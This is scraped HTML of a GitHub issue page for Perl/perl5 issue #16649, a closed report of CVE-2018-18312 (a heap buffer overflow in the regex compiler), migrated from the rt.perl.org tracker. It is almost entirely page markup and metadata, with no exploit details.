0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25h-8.5a.25.25 0 0 0-.25.25ZM8 13a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"></path> </svg> </template> <template id="package-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-package"> <path d="m8.878.392 5.25 3.045c.54.314.872.89.872 1.514v6.098a1.75 1.75 0 0 1-.872 1.514l-5.25 3.045a1.75 1.75 0 0 1-1.756 0l-5.25-3.045A1.75 1.75 0 0 1 1 11.049V4.951c0-.624.332-1.201.872-1.514L7.122.392a1.75 1.75 0 0 1 1.756 0ZM7.875 1.69l-4.63 2.685L8 7.133l4.755-2.758-4.63-2.685a.248.248 0 0 0-.25 0ZM2.5 5.677v5.372c0 .09.047.171.125.216l4.625 2.683V8.432Zm6.25 8.271 4.625-2.683a.25.25 0 0 0 .125-.216V5.677L8.75 8.432Z"></path> </svg> </template> <template id="credit-card-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-credit-card"> <path d="M10.75 9a.75.75 0 0 0 0 1.5h1.5a.75.75 0 0 0 0-1.5h-1.5Z"></path><path d="M0 3.75C0 2.784.784 2 1.75 2h12.5c.966 0 1.75.784 1.75 1.75v8.5A1.75 1.75 0 0 1 14.25 14H1.75A1.75 1.75 0 0 1 0 12.25ZM14.5 6.5h-13v5.75c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25Zm0-2.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25V5h13Z"></path> </svg> </template> <template id="play-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path> </svg> </template> <template id="gift-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-gift"> <path d="M2 2.75A2.75 2.75 0 0 1 4.75 0c.983 0 1.873.42 2.57 1.232.268.318.497.668.68 1.042.183-.375.411-.725.68-1.044C9.376.42 10.266 0 11.25 0a2.75 2.75 0 0 1 
2.45 4h.55c.966 0 1.75.784 1.75 1.75v2c0 .698-.409 1.301-1 1.582v4.918A1.75 1.75 0 0 1 13.25 16H2.75A1.75 1.75 0 0 1 1 14.25V9.332C.409 9.05 0 8.448 0 7.75v-2C0 4.784.784 4 1.75 4h.55c-.192-.375-.3-.8-.3-1.25ZM7.25 9.5H2.5v4.75c0 .138.112.25.25.25h4.5Zm1.5 0v5h4.5a.25.25 0 0 0 .25-.25V9.5Zm0-4V8h5.5a.25.25 0 0 0 .25-.25v-2a.25.25 0 0 0-.25-.25Zm-7 0a.25.25 0 0 0-.25.25v2c0 .138.112.25.25.25h5.5V5.5h-5.5Zm3-4a1.25 1.25 0 0 0 0 2.5h2.309c-.233-.818-.542-1.401-.878-1.793-.43-.502-.915-.707-1.431-.707ZM8.941 4h2.309a1.25 1.25 0 0 0 0-2.5c-.516 0-1 .205-1.43.707-.337.392-.646.975-.879 1.793Z"></path> </svg> </template> <template id="code-square-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code-square"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25Zm7.47 3.97a.75.75 0 0 1 1.06 0l2 2a.75.75 0 0 1 0 1.06l-2 2a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L10.69 8 9.22 6.53a.75.75 0 0 1 0-1.06ZM6.78 6.53 5.31 8l1.47 1.47a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215l-2-2a.75.75 0 0 1 0-1.06l2-2a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path> </svg> </template> <template id="device-desktop-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-desktop"> <path d="M14.25 1c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 14.25 12h-3.727c.099 1.041.52 1.872 1.292 2.757A.752.752 0 0 1 11.25 16h-6.5a.75.75 0 0 1-.565-1.243c.772-.885 1.192-1.716 1.292-2.757H1.75A1.75 1.75 0 0 1 0 10.25v-7.5C0 1.784.784 1 1.75 1ZM1.75 2.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25ZM9.018 12H6.982a5.72 5.72 0 0 1-.765 2.5h3.566a5.72 5.72 0 0 1-.765-2.5Z"></path> </svg> 
</template> <div class="position-relative"> <ul role="listbox" class="ActionListWrap QueryBuilder-ListWrap" aria-label="Suggestions" data-action=" combobox-commit:query-builder#comboboxCommit mousedown:query-builder#resultsMousedown " data-target="query-builder.resultsList" data-persist-list=false id="query-builder-test-results" ></ul> </div> <div class="FormControl-inlineValidation" id="validation-9f0e43c3-7256-46a8-86d4-1ce7b90c015a" hidden="hidden"> <span class="FormControl-inlineValidation--visual"> <svg aria-hidden="true" height="12" viewBox="0 0 12 12" version="1.1" width="12" data-view-component="true" class="octicon octicon-alert-fill"> <path d="M4.855.708c.5-.896 1.79-.896 2.29 0l4.675 8.351a1.312 1.312 0 0 1-1.146 1.954H1.33A1.313 1.313 0 0 1 .183 9.058ZM7 7V3H5v4Zm-1 3a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z"></path> </svg> </span> <span></span> </div> </div> <div data-target="query-builder.screenReaderFeedback" aria-live="polite" aria-atomic="true" class="sr-only"></div> </query-builder></form> <div class="d-flex flex-row color-fg-muted px-3 text-small color-bg-default search-feedback-prompt"> <a target="_blank" href="https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax" data-view-component="true" class="Link color-fg-accent text-normal ml-2">Search syntax tips</a> <div class="d-flex flex-1"></div> </div> </div> </div> </div> </modal-dialog></div> </div> <div data-action="click:qbsearch-input#retract" class="dark-backdrop position-fixed" hidden data-target="qbsearch-input.darkBackdrop"></div> <div class="color-fg-default"> <dialog-helper> <dialog data-target="qbsearch-input.feedbackDialog" data-action="close:qbsearch-input#handleDialogClose cancel:qbsearch-input#handleDialogClose" id="feedback-dialog" aria-modal="true" aria-labelledby="feedback-dialog-title" aria-describedby="feedback-dialog-description" data-view-component="true" class="Overlay Overlay-whenNarrow Overlay--size-medium Overlay--motion-scaleFade 
Overlay--disableScroll"> <div data-view-component="true" class="Overlay-header"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 class="Overlay-title " id="feedback-dialog-title"> Provide feedback </h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="feedback-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg></button> </div> </div> </div> <scrollable-region data-labelled-by="feedback-dialog-title"> <div data-view-component="true" class="Overlay-body"> <!-- '"` --><!-- </textarea></xmp> --></option></form><form id="code-search-feedback-form" data-turbo="false" action="/search/feedback" accept-charset="UTF-8" method="post"><input type="hidden" data-csrf="true" name="authenticity_token" value="tjeqT+3U4QUG4xnLMx63d7KbcbPpJzeC0JdXJXBu0qTBqZIgiiz/1QeWlo4XVlwhuUy8V1Yj6SoB3qwwKF5l8A==" /> <p>We read every piece of feedback, and take your input very seriously.</p> <textarea name="feedback" class="form-control width-full mb-2" style="height: 120px" id="feedback"></textarea> <input name="include_email" id="include_email" aria-label="Include my email address so I can be contacted" class="form-control mr-2" type="checkbox"> <label for="include_email" style="font-weight: normal">Include my email address so I can be contacted</label> </form></div> </scrollable-region> <div data-view-component="true" class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="feedback-dialog" type="button" data-view-component="true" class="btn"> 
Cancel </button> <button form="code-search-feedback-form" data-action="click:qbsearch-input#submitFeedback" type="submit" data-view-component="true" class="btn-primary btn"> Submit feedback </button> </div> </dialog></dialog-helper> <custom-scopes data-target="qbsearch-input.customScopesManager"> <dialog-helper> <dialog data-target="custom-scopes.customScopesModalDialog" data-action="close:qbsearch-input#handleDialogClose cancel:qbsearch-input#handleDialogClose" id="custom-scopes-dialog" aria-modal="true" aria-labelledby="custom-scopes-dialog-title" aria-describedby="custom-scopes-dialog-description" data-view-component="true" class="Overlay Overlay-whenNarrow Overlay--size-medium Overlay--motion-scaleFade Overlay--disableScroll"> <div data-view-component="true" class="Overlay-header Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 class="Overlay-title " id="custom-scopes-dialog-title"> Saved searches </h1> <h2 id="custom-scopes-dialog-description" class="Overlay-description">Use saved searches to filter your results more quickly</h2> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="custom-scopes-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg></button> </div> </div> </div> <scrollable-region data-labelled-by="custom-scopes-dialog-title"> <div data-view-component="true" class="Overlay-body"> <div data-target="custom-scopes.customScopesModalDialogFlash"></div> <div hidden class="create-custom-scope-form" 
data-target="custom-scopes.createCustomScopeForm"> <!-- '"` --><!-- </textarea></xmp> --></option></form><form id="custom-scopes-dialog-form" data-turbo="false" action="/search/custom_scopes" accept-charset="UTF-8" method="post"><input type="hidden" data-csrf="true" name="authenticity_token" value="m9JKMhKf+HAvOPSRlxJtFJ375vFXT1JdFUviEuQVQB+trY5jxLD9QECFsc5BZOl2SreE1Vx2hLCgQnGSDufIQg==" /> <div data-target="custom-scopes.customScopesModalDialogFlash"></div> <input type="hidden" id="custom_scope_id" name="custom_scope_id" data-target="custom-scopes.customScopesIdField"> <div class="form-group"> <label for="custom_scope_name">Name</label> <auto-check src="/search/custom_scopes/check_name" required only-validate-on-blur="false"> <input type="text" name="custom_scope_name" id="custom_scope_name" data-target="custom-scopes.customScopesNameField" class="form-control" autocomplete="off" placeholder="github-ruby" required maxlength="50"> <input type="hidden" data-csrf="true" value="aGZaO1YsYQcwpTqrIS72SBISy+GyK2U7IQw6Qgm/4WjwZDCukYsUdO9NTK2S5psiqIOI4iJIVj+YoGFvsw2grg==" /> </auto-check> </div> <div class="form-group"> <label for="custom_scope_query">Query</label> <input type="text" name="custom_scope_query" id="custom_scope_query" data-target="custom-scopes.customScopesQueryField" class="form-control" autocomplete="off" placeholder="(repo:mona/a OR repo:mona/b) AND lang:python" required maxlength="500"> </div> <p class="text-small color-fg-muted"> To see all available qualifiers, see our <a class="Link--inTextBlock" href="https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax">documentation</a>. 
</p> </form> </div> <div data-target="custom-scopes.manageCustomScopesForm"> <div data-target="custom-scopes.list"></div> </div> </div> </scrollable-region> <div data-view-component="true" class="Overlay-footer Overlay-footer--alignEnd Overlay-footer--divided"> <button data-action="click:custom-scopes#customScopesCancel" type="button" data-view-component="true" class="btn"> Cancel </button> <button form="custom-scopes-dialog-form" data-action="click:custom-scopes#customScopesSubmit" data-target="custom-scopes.customScopesSubmitButton" type="submit" data-view-component="true" class="btn-primary btn"> Create saved search </button> </div> </dialog></dialog-helper> </custom-scopes> </div> </qbsearch-input> <div class="position-relative HeaderMenu-link-wrap d-lg-inline-block"> <a href="/login?return_to=https%3A%2F%2Fgithub.com%2FPerl%2Fperl5%2Fissues%2F16649" class="HeaderMenu-link HeaderMenu-link--sign-in HeaderMenu-button flex-shrink-0 no-underline d-none d-lg-inline-flex border border-lg-0 rounded rounded-lg-0 px-2 py-1" style="margin-left: 12px;" data-hydro-click="{&quot;event_type&quot;:&quot;authentication.click&quot;,&quot;payload&quot;:{&quot;location_in_page&quot;:&quot;site header menu&quot;,&quot;repository_id&quot;:null,&quot;auth_type&quot;:&quot;SIGN_UP&quot;,&quot;originating_url&quot;:&quot;https://github.com/Perl/perl5/issues/16649&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="387e104a4aeea723f9808b36dd604512701e80ec48a53afc1733024c28e53a72" data-analytics-event="{&quot;category&quot;:&quot;Marketing nav&quot;,&quot;action&quot;:&quot;click to go to homepage&quot;,&quot;label&quot;:&quot;ref_page:Marketing;ref_cta:Sign in;ref_loc:Header&quot;}" > Sign in </a> </div> <a href="/signup?ref_cta=Sign+up&amp;ref_loc=header+logged+out&amp;ref_page=%2F%3Cuser-name%3E%2F%3Crepo-name%3E%2Fvoltron%2Fissues_fragments%2Fissue_layout&amp;source=header-repo&amp;source_repo=Perl%2Fperl5" class="HeaderMenu-link HeaderMenu-link--sign-up HeaderMenu-button 
flex-shrink-0 d-flex d-lg-inline-flex no-underline border color-border-default rounded px-2 py-1" data-hydro-click="{&quot;event_type&quot;:&quot;authentication.click&quot;,&quot;payload&quot;:{&quot;location_in_page&quot;:&quot;site header menu&quot;,&quot;repository_id&quot;:null,&quot;auth_type&quot;:&quot;SIGN_UP&quot;,&quot;originating_url&quot;:&quot;https://github.com/Perl/perl5/issues/16649&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="387e104a4aeea723f9808b36dd604512701e80ec48a53afc1733024c28e53a72" data-analytics-event="{&quot;category&quot;:&quot;Sign up&quot;,&quot;action&quot;:&quot;click to sign up for account&quot;,&quot;label&quot;:&quot;ref_page:/&lt;user-name&gt;/&lt;repo-name&gt;/voltron/issues_fragments/issue_layout;ref_cta:Sign up;ref_loc:header logged out&quot;}" > Sign up </a> <button type="button" class="sr-only js-header-menu-focus-trap d-block d-lg-none">Reseting focus</button> </div> </div> </div> </div> </header> <div hidden="hidden" data-view-component="true" class="js-stale-session-flash stale-session-flash flash flash-warn flash-full"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path> </svg> <span class="js-stale-session-flash-signed-in" hidden>You signed in with another tab or window. <a class="Link--inTextBlock" href="">Reload</a> to refresh your session.</span> <span class="js-stale-session-flash-signed-out" hidden>You signed out in another tab or window. 
<a class="Link--inTextBlock" href="">Reload</a> to refresh your session.</span> <span class="js-stale-session-flash-switched" hidden>You switched accounts on another tab or window. <a class="Link--inTextBlock" href="">Reload</a> to refresh your session.</span> <button id="icon-button-05fbfa36-d79d-4a83-a3b8-ea404723c793" aria-labelledby="tooltip-de90e49a-09a1-4bc8-8d7f-0e64b81e634d" type="button" data-view-component="true" class="Button Button--iconOnly Button--invisible Button--medium flash-close js-flash-close"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x Button-visual"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg> </button><tool-tip id="tooltip-de90e49a-09a1-4bc8-8d7f-0e64b81e634d" for="icon-button-05fbfa36-d79d-4a83-a3b8-ea404723c793" popover="manual" data-direction="s" data-type="label" data-view-component="true" class="sr-only position-absolute">Dismiss alert</tool-tip> </div> </div> <div id="start-of-content" class="show-on-focus"></div> <div id="js-flash-container" class="flash-container" data-turbo-replace> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg> 
</button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div> </div> </div> </div> </template> </div> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled data-project-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" > <div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--page-header-bgColor, var(--color-page-header-bg));" data-turbo-replace> <div class="d-flex flex-nowrap flex-justify-end mb-3 px-3 px-lg-5" style="gap: 1rem;"> <div class="flex-auto min-width-0 width-fit"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path> </svg> <span class="author flex-self-stretch" itemprop="author"> <a class="url fn" rel="author" data-hovercard-type="organization" data-hovercard-url="/orgs/Perl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/Perl"> Perl </a> </span> <span class="mx-1 flex-self-stretch color-fg-muted">/</span> <strong itemprop="name" class="mr-2 flex-self-stretch"> <a data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" href="/Perl/perl5">perl5</a> </strong> <span></span><span class="Label Label--secondary v-align-middle mr-1">Public</span> </div> </div> <div 
id="repository-details-container" class="flex-shrink-0" data-turbo-replace style="max-width: 70%;"> <ul class="pagehead-actions flex-shrink-0 d-none d-md-inline" style="padding: 2px 0;"> <li> <a href="/login?return_to=%2FPerl%2Fperl5" rel="nofollow" id="repository-details-watch-button" data-hydro-click="{&quot;event_type&quot;:&quot;authentication.click&quot;,&quot;payload&quot;:{&quot;location_in_page&quot;:&quot;notification subscription menu watch&quot;,&quot;repository_id&quot;:null,&quot;auth_type&quot;:&quot;LOG_IN&quot;,&quot;originating_url&quot;:&quot;https://github.com/Perl/perl5/issues/16649&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="24a831d84dbcb88b6a0e68f472d242e9ceabda18027c4435561aa334d7da79ff" aria-label="You must be signed in to change notification settings" data-view-component="true" class="btn-sm btn"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path> </svg>Notifications </a> <tool-tip id="tooltip-6baef4b7-0c80-46cb-9949-bc1089c0d467" for="repository-details-watch-button" popover="manual" data-direction="s" data-type="description" data-view-component="true" class="sr-only position-absolute">You must be signed in to change notification settings</tool-tip> </li> <li> <a icon="repo-forked" id="fork-button" href="/login?return_to=%2FPerl%2Fperl5" rel="nofollow" 
data-hydro-click="{&quot;event_type&quot;:&quot;authentication.click&quot;,&quot;payload&quot;:{&quot;location_in_page&quot;:&quot;repo details fork button&quot;,&quot;repository_id&quot;:8183570,&quot;auth_type&quot;:&quot;LOG_IN&quot;,&quot;originating_url&quot;:&quot;https://github.com/Perl/perl5/issues/16649&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="f4d2e9c1b7094e88ff5c91028d730416b73c1ff3d0d15f3a07558ead000ffa78" data-view-component="true" class="btn-sm btn"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path> </svg>Fork <span id="repo-network-counter" data-pjax-replace="true" data-turbo-replace="true" title="571" data-view-component="true" class="Counter">571</span> </a> </li> <li> <div data-view-component="true" class="BtnGroup d-flex"> <a href="/login?return_to=%2FPerl%2Fperl5" rel="nofollow" data-hydro-click="{&quot;event_type&quot;:&quot;authentication.click&quot;,&quot;payload&quot;:{&quot;location_in_page&quot;:&quot;star button&quot;,&quot;repository_id&quot;:8183570,&quot;auth_type&quot;:&quot;LOG_IN&quot;,&quot;originating_url&quot;:&quot;https://github.com/Perl/perl5/issues/16649&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="c81170a2616faa37eecb197f4735090e2d483902ec67da616097bb1f9603e072" aria-label="You must be signed in to star a repository" data-view-component="true" class="tooltipped tooltipped-sw btn-sm btn"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star 
v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path> </svg><span data-view-component="true" class="d-inline"> Star </span> <span id="repo-stars-counter-star" aria-label="2063 users starred this repository" data-singular-suffix="user starred this repository" data-plural-suffix="users starred this repository" data-turbo-replace="true" title="2,063" data-view-component="true" class="Counter js-social-count">2.1k</span> </a></div> </li> </ul> </div> </div> <div id="responsive-meta-container" data-turbo-replace> </div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <ul data-view-component="true" class="UnderlineNav-body list-style-none"> <li data-view-component="true" class="d-inline-flex"> <a id="code-tab" href="/Perl/perl5" data-tab-item="i0code-tab" data-selected-links="repo_source repo_downloads repo_commits repo_releases repo_tags repo_branches repo_packages repo_deployments repo_attestations /Perl/perl5" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g c" data-analytics-event="{&quot;category&quot;:&quot;Underline navbar&quot;,&quot;action&quot;:&quot;Click tab&quot;,&quot;label&quot;:&quot;Code&quot;,&quot;target&quot;:&quot;UNDERLINE_NAV.TAB&quot;}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg 
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " > <react-app app-name="issues-react" initial-path="/Perl/perl5/issues/16649" style="display: block; min-height: calc(100vh - 64px);" data-attempted-ssr="true" data-ssr="true" data-lazy="false" data-alternate="false" data-data-router-enabled="false" > <script type="application/json" data-target="react-app.embeddedData">{"payload":{"preloaded_records":{},"preloadedQueries":[{"queryId":"3dddeeb0bc5f88ccaca7204fa97a09b8","queryName":"IssueViewerViewQuery","variables":{"id":"repository","number":16649,"owner":"Perl","repo":"perl5"},"result":{"data":{"repository":{"isOwnerEnterpriseManaged":false,"issue":{"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","updatedAt":"2019-05-22T15:06:10Z","title":"[CVE-2018-18312] regcomp: heap-buffer-overflow write / reg_node overrun (perl-5.28.0, 
5.26.2)","number":16649,"repository":{"nameWithOwner":"Perl/perl5","id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","login":"Perl","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","url":"https://github.com/Perl"},"isArchived":false,"isPrivate":false,"databaseId":8183570,"slashCommandsEnabled":false,"viewerCanInteract":false,"viewerInteractionLimitReasonHTML":"","planFeatures":{"maximumAssignees":10},"visibility":"PUBLIC","pinnedIssues":{"totalCount":0},"viewerCanPinIssues":false,"issueTypes":{"edges":[{"node":{"id":"IT_kwDOADa1g84ABOlf"}},{"node":{"id":"IT_kwDOADa1g84ABOli"}},{"node":{"id":"IT_kwDOADa1g84ABOln"}}]}},"titleHTML":"[CVE-2018-18312] regcomp: heap-buffer-overflow write / reg_node overrun (perl-5.28.0, 5.26.2)","url":"https://github.com/Perl/perl5/issues/16649","viewerCanUpdateNext":false,"issueType":null,"state":"CLOSED","stateReason":"COMPLETED","duplicateOf":null,"linkedPullRequests":{"nodes":[]},"subIssuesSummary":{"total":0,"completed":0},"__isLabelable":"Issue","labels":{"edges":[],"pageInfo":{"endCursor":null,"hasNextPage":false}},"__isNode":"Issue","assignees":{"nodes":[]},"milestone":null,"databaseId":509394960,"viewerDidAuthor":false,"locked":false,"author":{"__typename":"User","__isActor":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4","profileUrl":"https://github.com/p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4"},"__isComment":"Issue","body":"Migrated from [rt.perl.org#133423](https://rt-archive.perl.org/perl5/Ticket/Display.html?id=133423) (status was 'resolved')\n\nSearchable as RT133423$\n","bodyHTML":"\u003cp dir=\"auto\"\u003eMigrated from \u003ca href=\"https://rt-archive.perl.org/perl5/Ticket/Display.html?id=133423\" rel=\"nofollow\"\u003ert.perl.org#133423\u003c/a\u003e (status was 'resolved')\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSearchable as 
